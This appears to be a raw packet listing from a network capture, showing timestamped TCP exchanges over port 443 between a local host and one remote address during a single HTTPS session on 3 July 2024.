Jul 3, 2024 16:17:20.968211889 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:20.968626022 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:20.968642950 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:20.968674898 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:20.968683958 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:20.968705893 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:20.968724012 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.019088984 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.019115925 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.019186020 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.019227028 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.019244909 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.019259930 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.019485950 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.019503117 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.019542933 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.019556046 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.019587994 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.020225048 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.020243883 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.020292997 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.020314932 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.020330906 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.020353079 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.020731926 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.020749092 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.020786047 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.020797968 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.020821095 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.020836115 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.021459103 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.021473885 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.021524906 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.021539927 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.021573067 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.021740913 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.021756887 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.021784067 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.021792889 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.021810055 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.021826982 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.028651953 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.075828075 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.075855017 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.075898886 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.075907946 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.075921059 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.075934887 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.075939894 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.075957060 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.075972080 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.075987101 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.076004982 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.107234001 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.107249975 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.107331991 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.107367992 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.107398033 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.107450008 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.107469082 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.107491970 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.107496977 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.107522964 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.107537985 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.108077049 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108094931 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108122110 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.108125925 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108153105 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.108549118 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108563900 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108591080 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.108594894 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108619928 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.108923912 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108939886 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108964920 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108967066 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.108978987 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.108984947 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.108999968 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.109534025 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.109575033 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.109579086 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.109594107 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.109613895 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.109628916 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.148416996 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.148449898 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.148565054 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.148597956 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.148638964 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.148932934 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.148952007 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.148989916 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.149000883 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.149020910 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.149038076 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.195727110 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.195759058 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.195816994 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.195847988 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.195868015 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.195889950 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.196736097 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.196758986 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.196826935 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.196840048 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.196875095 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.197118998 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.197135925 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.197165012 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.197173119 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.197195053 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.197211027 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.197581053 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.197599888 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.197638988 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.197647095 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.197678089 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.198630095 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.198649883 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.198674917 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.198684931 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.198705912 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.198724031 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.199028969 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.199075937 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.199106932 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.199114084 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.199126005 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.199142933 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.237112045 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.237142086 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.237260103 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.237291098 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.237334013 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.237517118 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.237538099 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.237596035 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.237601042 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.237641096 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.283258915 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.283286095 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.283447027 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.283476114 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.283518076 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.283638954 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.283654928 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.283693075 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.283699036 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.283721924 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.283735037 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.284167051 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.284183025 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.284246922 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.284251928 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.284290075 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.284802914 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.284818888 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.284867048 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.284873009 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.284919024 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.285423994 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.285439014 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.285495043 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.285501003 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.285514116 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.285546064 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.286247969 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.286263943 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.286317110 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.286324024 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.286360979 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.336019039 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.336198092 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.336507082 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.336524010 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.336592913 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.336608887 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.336997032 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.337018013 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.337065935 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.337073088 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.337081909 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.371476889 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.371501923 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.371556044 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.371592045 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.371606112 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.372246027 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.372266054 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.372297049 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.372303963 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.372318983 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.372807980 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.372822046 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.372860909 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.372867107 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.372884989 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.372998953 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373095989 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.373101950 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373119116 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373146057 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.373161077 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.373353958 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373367071 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373394966 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373421907 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.373426914 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373445988 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.373920918 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373939991 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.373970032 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.373975039 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.374002934 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.374011040 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.390228033 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.423564911 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.423595905 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.423640966 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.423666954 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.423681974 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.423702955 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.424186945 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.424204111 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.424240112 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.424246073 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.424276114 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.458391905 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.458416939 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.458470106 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.458492041 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.458512068 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.458525896 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.459291935 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.459307909 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.459351063 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.459357977 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.459384918 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.459399939 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.459815979 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.459836960 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.459876060 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.459882021 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.459912062 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.460537910 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.460557938 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.460599899 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.460606098 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.460635900 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.460649967 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.461090088 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.461107969 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.461153030 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.461159945 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.461199045 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.461203098 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.461777925 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.461803913 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.461829901 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.461837053 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.461863995 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.509310007 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.511754990 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.511811018 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.511831045 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.511841059 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.511869907 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.512538910 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.512554884 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.512612104 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.512617111 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.546391010 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.546411037 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.546509981 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.546535015 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.547868967 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.547883987 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.547951937 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.547957897 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.547981024 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.548599005 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.548619032 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.548667908 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.548679113 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.548719883 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.549479008 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.549493074 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.549550056 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.549561024 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.549576044 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.550445080 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.550458908 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.550508976 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.550514936 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.550535917 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.551130056 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.551142931 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.551189899 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.551194906 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.598848104 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.598874092 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.598938942 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.598975897 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.598989964 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.599601030 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.599622965 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.599648952 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.599654913 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.599682093 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.633969069 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.633985043 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.634030104 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.634042978 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.634057999 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.635207891 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.635222912 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.635277033 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.635284901 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.636194944 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.636209965 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.636255980 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.636262894 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.636285067 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.636960030 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.636975050 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.637027979 CEST	49711	443	192.168.2.10	104.21.10.178
Jul 3, 2024 16:17:21.637034893 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.638030052 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.638045073 CEST	443	49711	104.21.10.178	192.168.2.10
Jul 3, 2024 16:17:21.638087988 CEST	49711	443	192.168.2.10	104.21.10.178
